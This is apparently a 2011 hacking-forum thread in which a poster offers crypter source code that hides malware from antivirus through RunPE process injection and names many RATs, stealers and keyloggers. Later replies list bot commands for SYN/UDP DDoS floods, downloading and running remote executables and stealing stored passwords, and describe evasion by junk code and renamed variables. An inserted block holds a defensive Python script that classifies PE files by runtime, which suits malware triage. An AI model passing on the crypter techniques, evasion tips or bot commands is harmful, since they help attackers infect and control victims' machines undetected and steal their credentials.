cipher Posted January 5, 2011
Hello, I am here today with the executable that can obfuscate the virus and make it fully undetectable by anti-viruses. This executable uses RunPE techniques to inject into another process and to dump the crypted code into memory, and hence the executable's code remains undetected by anti-viruses. These crypters are programmed by individuals and hence remain undetected most of the time. Mostly they are coded in VB or .NET, and hence you will find most of the viruses showing VB attributes during PE scans, but mostly the viruses/RATs/stealers/bots/worms are coded in Borland Delphi.
Examples:
1) RATs: CyberGate, Blackshades, Pixel, SpyNet, DarkComet etc.
2) Stealers: iStealer v6.0 (latest), Albertino, Maya password stealer etc.
3) Keyloggers: Albertino, Rapzo, Irtech etc.
4) Crypters: iCrypt, Galaxy, Blackout AIO, Demon, CypherX (www.crypters.net) etc.
The sample crypter source code is attached here: CodingNation_Crypter_Source.rar
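The post says a PE scan of these samples usually shows VB attributes. The defender-side counterpart is a static triage step that reads the import table and the CLR data directory to tell a VB6-runtime binary from a .NET one. The script below is an added example, not code from the original post or from any crypter named there: it parses the PE headers directly (no pefile dependency), walks IMAGE_IMPORT_DESCRIPTOR entries, and flags MSVBVM50/MSVBVM60 imports or a populated CLR directory. The PE images it runs on are constructed by build_sample_pe() as minimal synthetic files (not real samples and not executable); the runtime-DLL names it keys on are the only heuristic applied, an assumption of this example rather than a complete classifier.

```python
import struct

VB_RUNTIMES = {"msvbvm50.dll", "msvbvm60.dll"}   # classic VB5/VB6 runtime
CLR_RUNTIME = "mscoree.dll"                      # .NET loader stub import
DIR_IMPORT, DIR_CLR = 1, 14                      # IMAGE_DIRECTORY_ENTRY_* indices


def parse_headers(data):
    """Return (data_directories, sections) from a PE32 or PE32+ image."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    pe = struct.unpack_from("<I", data, 0x3C)[0]          # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsections = struct.unpack_from("<H", data, pe + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]
    opt = pe + 24                                          # optional header
    magic = struct.unpack_from("<H", data, opt)[0]
    dd_off = opt + (96 if magic == 0x10B else 112)         # PE32 vs PE32+
    dirs = [struct.unpack_from("<II", data, dd_off + 8 * i) for i in range(16)]
    sections = []
    for i in range(nsections):
        o = opt + opt_size + 40 * i
        vsize, va, rawsize, raw = struct.unpack_from("<IIII", data, o + 8)
        sections.append((va, max(vsize, rawsize), raw))
    return dirs, sections


def rva_to_offset(sections, rva):
    """Map a relative virtual address to a file offset via the section table."""
    for va, size, raw in sections:
        if va <= rva < va + size:
            return raw + (rva - va)
    raise ValueError("RVA 0x%x is outside every section" % rva)


def imported_dlls(data):
    """Walk IMAGE_IMPORT_DESCRIPTOR entries and return lower-cased DLL names."""
    dirs, sections = parse_headers(data)
    imp_rva, _ = dirs[DIR_IMPORT]
    if imp_rva == 0:
        return []
    off = rva_to_offset(sections, imp_rva)
    dlls = []
    while True:
        # OriginalFirstThunk, TimeDateStamp, ForwarderChain, Name, FirstThunk
        _, _, _, name_rva, _ = struct.unpack_from("<IIIII", data, off)
        if name_rva == 0:                                  # all-zero terminator
            break
        noff = rva_to_offset(sections, name_rva)
        dlls.append(data[noff:data.index(b"\0", noff)].decode("ascii", "replace").lower())
        off += 20
    return dlls


def classify_runtime(data):
    """Tags a defender would note in triage: 'vb6' and/or 'dotnet'."""
    dirs, _ = parse_headers(data)
    dlls = imported_dlls(data)
    tags = []
    if VB_RUNTIMES & set(dlls):
        tags.append("vb6")
    if dirs[DIR_CLR][0] != 0 or CLR_RUNTIME in dlls:
        tags.append("dotnet")
    return tags


def build_sample_pe(dlls, clr=False):
    """Constructed test input: a minimal PE32 with one section holding an
    import table for `dlls`.  Not executable, not a real sample."""
    sec_va, sec_raw = 0x1000, 0x200
    desc_size = 20 * (len(dlls) + 1)
    names, name_rvas = b"", []
    for d in dlls:
        name_rvas.append(sec_va + desc_size + len(names))
        names += d.encode("ascii") + b"\0"
    body = b"".join(struct.pack("<IIIII", 0, 0, 0, rva, 0) for rva in name_rvas)
    body += b"\0" * 20 + names                             # terminator + strings
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)    # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                  # PE32 magic
    struct.pack_into("<II", opt, 96 + 8 * DIR_IMPORT, sec_va, desc_size)
    if clr:  # a non-zero CLR directory is all classify_runtime() looks at
        struct.pack_into("<II", opt, 96 + 8 * DIR_CLR, sec_va + 0x800, 72)
    sect = b".idata\0\0" + struct.pack("<IIII", len(body), sec_va, len(body), sec_raw) + b"\0" * 16
    hdr = dos + coff + opt + sect
    return hdr + b"\0" * (sec_raw - len(hdr)) + body


if __name__ == "__main__":
    for label, image in [("vb6 sample", build_sample_pe(["MSVBVM60.DLL", "KERNEL32.dll"])),
                         (".net sample", build_sample_pe(["mscoree.dll"], clr=True)),
                         ("native sample", build_sample_pe(["KERNEL32.dll", "USER32.dll"]))]:
        print(label, imported_dlls(image), classify_runtime(image))
```

On a real file, replace the constructed images with open(path, "rb").read(). The VB6 runtime import is a reliable marker because the stub the post describes still has to load MSVBVM60.DLL to run; a Delphi build shows neither tag here, which is the gap the author's remark about Borland Delphi points at.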
k5h Posted March 30, 2011
http://www.virustotal.com/file-scan/report.html?id=7d389377a5bf54147bc675df8a1ca0742991224b3c21e1ad7aa131e6b81575fc-1301452801
http://www.virustotal.com/file-scan/report.html?id=a77380725c96204df0bbad34a715358b1e193989f3e9053cefe80a73ad19816c-1301452813
I think the below code must not be present in a crypter project; this makes it behave like a bot:
hello [login]
.bai [logout]
.removeAll [removes ALL bots]
DDoS CMDs:
./syn (google.com 80 1000)
./udp (google.com 80 1000) Careful, might destroy bots
Download/Update:
./download (http://site.com/file.exe C:\file.exe 1)
./update (????)
MSC:
./msnmsg (hey is this you? www.yoursite.com)
./visit (http://site.com/)
./pstore (all pswds)
./pstoreS (./pstoreS paypal: searches paypal)
Blue Posted June 1, 2011
@Cipher: Thanks mate, but old goodies; I played with them when I was learning CEH. These goodies are no more; for example in our team ICA, we don't use things like this. Try the self-mod version of Fly Crypter. And also a nice name collection of RATs.
@ksanket: These codes are not used to make it behave like a bot; these codes are part of a Trojan or stealer.
cipher (Author) Posted July 22, 2011
@Blue indian: I guess you are talking about a polymorphic engine, but still 99% of the crypters on the market use the same PE injection technique. I don't know much about the polymorphic engine, though; still, they manage to make it FUD by adding junk code, by changing the variable names and by some advanced techniques.
eliasxxlturbo Posted May 6, 2013
Thanks for sharing, friend, you rock!! Nice crypter collection.